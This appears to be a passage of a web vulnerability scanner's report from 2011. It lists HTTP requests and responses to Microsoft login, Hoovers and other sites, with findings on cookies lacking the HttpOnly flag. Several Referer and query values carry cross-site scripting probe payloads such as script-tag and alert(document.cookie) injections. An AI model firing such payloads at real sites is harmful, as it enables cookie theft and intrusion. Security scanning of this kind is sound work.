GET /login.srf HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296343067&co=1&id=265631; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:47:54 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H24 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:46:54 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296344874&id=N&co=1; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-f2f145b9-7949-4a38-9839-b8a7726474e0; path=/;version=1 X-Frame-Options: deny Content-Length: 11332
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1296342524&rver=6.1.6206.0&wp=MBI&wreply=http:%2F%2Fmail.live.com%2F%3Frru%3Dhome%26livecom%3D1&lc=1033&id=251248&cbcxt=hom&mkt=en-US HTTP/1.1 Host: login.live.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; xidseq=1; mktstate=S=821848180&U=&E=&P=&B=en-us; mkt1=norm=en-us; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; wla42=
Response
HTTP/1.1 200 OK Cache-Control: no-cache Connection: close Date: Sat, 29 Jan 2011 23:12:17 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:11:17 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H55 V: 0 P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296342737&co=1&id=251248; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce; domain=login.live.com;path=/;version=1 X-Frame-Options: deny Vary: Accept-Encoding Content-Length: 13981
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pp900/ HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:13:14 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H36 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:12:14 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296342794&co=1&id=N; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4c2d8b39-4613-4bc8-bb07-53657b3f42ca; path=/;version=1 X-Frame-Options: deny Content-Length: 11416
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ppsecure/post.srf HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:13:14 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H52 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:12:14 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-df41315e-45c6-4d60-b893-881795a1cb21; path=/;version=1 X-Frame-Options: deny Content-Length: 11450
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ppsecure/secure.srf HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:13:16 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H45 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:12:16 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPRequ=lt=1296342796&co=1&id=N; path=/;version=1 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-23efde8d-b534-4b63-8d36-38dc6e68d0f0; path=/;version=1 X-Frame-Options: deny Content-Length: 11444
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /resetpw.srf HTTP/1.1 Host: login.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:13:17 GMT Server: Microsoft-IIS/6.0 PPServer: PPV: 30 H: BAYIDSLGN1H48 V: 0 Content-Type: text/html; charset=utf-8 Expires: Sat, 29 Jan 2011 23:12:17 GMT Cache-Control: no-cache Pragma: no-cache P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" X-XSS-Protection: 0 Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4b999dd4-4e4f-4340-b8dc-e3af3429245c; path=/;version=1 Set-Cookie: MSPBack=0; domain=login.live.com;path=/;version=1 Content-Length: 1188
<html><head><noscript>JavaScript required to sign in<meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033"/></noscript><title>Continue</title><script type= ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1 Host: login.silverlight.net Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=d2ro42a2hvkbut554hcs2zuf; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: forums.ReturnUrl=http://www.silverlight.net/showcase/default.aspx; domain=login.silverlight.net; expires=Sat, 29-Jan-2011 23:27:25 GMT; path=/ X-Powered-By: ASP.NET X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:17:25 GMT Content-Length: 9085
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/signin.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fshowcase%2fdefault.aspx HTTP/1.1 Host: login.silverlight.net Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; s_cc=true; s_sq=%5B%5BB%5D%5D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif?&dcsdat=1296399108887&dcssip=ajax.microsoft.com&dcsuri=/ajax/jQuery/jquery-1.3.2.min.js'&dcsref=http://burp/show/42&WT.co_f=173.193.214.243-2629510496.30125799&WT.vtid=173.193.214.243-2629510496.30125799&WT.vtvs=1296399108891&WT.vt_f_tlv=1294845031&WT.tz=-6&WT.bh=8&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x969&WT.fv=10.1&WT.slv=Unknown&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&WT.sli=Installed&WT.dcsvid=60c2f44dfd912641a24c313b7d619d75&WT.z_anonid=AxUFAAAAAAAWBwAAtB6%2FBX1JsfAlwGK0F9Loug!!&WT.vt_f_tlh=1294845031&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_nvr1=1&WT.vt_nvr2=1&WT.vt_nvr3=1&wtEvtSrc=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&wtDrillDir=%2Fajax%2F%3B%2Fajax%2Fjquery%2F&WT.dep=wtEvtSrc%3BwtDrillDir HTTP/1.1 Host: m.webtrends.com Proxy-Connection: keep-alive Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js' Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjI5NTEwNDk2LjMwMTI1Nzk5AAAAAAADAAAACgAAANvfJ0263ydNtQAAAPcWLU30Fi1NHAEAAHrELU1zxC1NAwAAABMAAADb3ydNut8nTVcAAAD3Fi1N9BYtTRUAAAB6xC1Nc8QtTQAAAAA-
Response
HTTP/1.1 303 Object Moved Connection: close Date: Sun, 30 Jan 2011 14:50:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif?dcsredirect=124&dcstlh=0&dcstlv=0&dcsdat=1296399108887&dcssip=ajax.microsoft.com&dcsuri=/ajax/jQuery/jquery-1.3.2.min.js'&dcsref=http://burp/show/42&WT.co_f=173.193.214.243-2629510496.30125799&WT.vtid=173.193.214.243-2629510496.30125799&WT.vtvs=1296399108891&WT.vt_f_tlv=1294845031&WT.tz=-6&WT.bh=8&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=We%20are%20sorry%2C%20the%20page%20you%20requested%20cannot%20be%20found.&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x969&WT.fv=10.1&WT.slv=Unknown&WT.le=ISO-8859-1&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&WT.sli=Installed&WT.dcsvid=60c2f44dfd912641a24c313b7d619d75&WT.z_anonid=AxUFAAAAAAAWBwAAtB6%2FBX1JsfAlwGK0F9Loug!!&WT.vt_f_tlh=1294845031&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_nvr1=1&WT.vt_nvr2=1&WT.vt_nvr3=1&wtEvtSrc=ajax.microsoft.com%2Fajax%2FjQuery%2Fjquery-1.3.2.min.js'&wtDrillDir=%2Fajax%2F%3B%2Fajax%2Fjquery%2F&WT.dep=wtEvtSrc%3BwtDrillDir Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjI5NTEwNDk2LjMwMTI1Nzk5AAAAAAAEAAAACgAAANvfJ0263ydNtQAAAPcWLU30Fi1NHAEAAHrELU1zxC1NzQAAAM16RU3NekVNAwAAABMAAADNekVNzXpFTVcAAAD3Fi1N9BYtTRUAAAB6xC1Nc8QtTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /w/tre?ad_id=23189;evt=16009;cat1=19307;cat2=19308;rand=85918057 HTTP/1.1 Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; vt=10070:256698:477674:54816:0:1295925050:3|11008:274624:511498:54393:0:1296265712:0|; pjw=BBgAAAACIAMDVnFDTSAGAQABIAMCOSsEYAcCvMkHIA2AEwBT4AIfBDzSAwAFIBcB+hHgAR8AUOACHwHrHIA/ASuq4AEfAE3gAh8BZi6AHwDU4AJfAErgAh8BBjqAHwEI5OABPwBH4AIfASQwgB8BFc3gAR8AROACHwGgN4AfAfXg4AEfAEHgAh8B5i+AHwBf4AI/AD7gAh8CYEUEYRMB/ffgAT8AN+ACHwBfoB8A/OACHwAw4AIfBE5HBAADIR8B6PvgAT8AHeACHwBQID9BZwDX4AI/ABfgAh8BtCmAHwHkwOABPwFBd+EBnwKP6AJgPwEzykGFIS8gAwDw4AI/AMChHwEKzoA/QB8AZOACHwGRQYBfAe7y4AEfAGHgAh8AYyCfQhMBAPjgAR8AW+ACHwBkoB8AAeACHwBY4AIfAIKgXwH78OABPwBR4AIfBCTpAwAKIF4Ax+ACH+ED/wAeoL8AFKGfQL8AP+ACPwBAon8A/qJ/QB8AIOACHwEpP4DfAQ7t4AF/ABjgAh8BYkOAHwFx9cAfAQAA; adv_ic=ByAAAABBd0NNIAYGAAFJAAC2USAHIAtAAAHwceABFwH6XeABFwE+cqAXBEMAAPxI4AEXAGTgAi8Bq17gARfgAy8AaOACFwBh4AIvAZlQ4AEvAD3gAl8AsOACLwBY4AIv4ANH4AMvAeFZ4AFHAFbgAi8A5CDbwNfgAy8BAlvgARcAUOACLwSLXAAABEEEIAACHrNAgR8g7wCpIO8AYCATQAAATeACLwDVIC8AAkAUIAACvQ0/4AAvABsgjwB2IBNAAABL4AIvAdtX4AF3AErgAhcAGuACpwBB4AIXAD/hAgcAIOACFwB54AK/AB3gAhcAxeACLwAY4AIX4QNP4AMXAWU44AGPAVzVoO8giwBk4AIXAIvA1yAXBM1PAAADQNQgAABV4AIXAUdT4AFHACbgAhcAD+ACjwAD4AIXABjgAhcB/gyhNyBfAbda4AFHANzgAhcAxuACFwDY4AIXACjgAkcAxOACFwAV4AIXAKvgAhcBeUfAXwEAAA==; pluto=517004695355|v1
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: metrics.hoovers.com Proxy-Connection: keep-alive Referer: http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml?7ffa5%22%3balert(document.cookie)//4d5eca5bcd1=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HID=10.1.1.227.122391296352471936; s_cc=true; s_nr=1296352492087; s_ats=undefinedburpburpReferrersReferrers; ctc2=1
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:54:49 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A26274851D2CD5-60000130C044F459[CE]; Expires=Tue, 29 Jan 2013 01:54:49 GMT; Domain=.hoovers.com; Path=/ Location: http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878?AQB=1&pccr=true&vidn=26A26274851D2CD5-60000130C044F459&&ndh=1&t=29/0/2011%2019%3A54%3A52%206%20360&ns=hoovers&cl=63072000&g=http%3A//www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml%3F7ffa5%2522%253balert%28document.cookie%29//4d5eca5bcd1%3D1&r=http%3A//burp/show/25&cc=USD&ch=hoovers&server=hoovers.com&events=event2%2Cevent22&c1=7%3A30PM&v1=7%3A30PM&c2=Saturday&v2=Saturday&c3=Weekend&v3=Weekend&c4=paid&v4=paid&c8=500&v14=hoovers&c15=/global/mktg/index.xhtml%3Fpageid%3D13823%267ffa5&v29=burp&v31=Referrers&c48=New&v48=New&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1036&bh=969&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Sat, 29 Jan 2011 01:54:49 GMT Last-Modified: Mon, 31 Jan 2011 01:54:49 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www334 Content-Length: 0 Content-Type: text/plain
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: michaelwann.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:08:31 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=0c7ec67e6546a0d27335d16adf1ea700; expires=Sat, 25-Jan-2031 02:08:31 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auto-insurance/article.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=c08717139d004559bd4f0225c985624e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM06 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:48:12 GMT Content-Length: 136393
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=4d8ce924396e4151b191c200b28be405; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM07 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:47:59 GMT Content-Length: 81669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /currency/currency-clash-dollar-vs-euro-smartmoney.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=a96ec68b7d3a41e88ae91566940da75a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM08 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:47:57 GMT Content-Length: 70397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /identity-theft/default-dyn.aspx HTTP/1.1 Host: money.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: MC1=V=3&GUID=8a19b1c37abe4adaa07e1fe54f2a83e1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: CO1MPPRENM05 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 29 Jan 2011 23:48:03 GMT Content-Length: 52097
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><l ...[SNIP]...
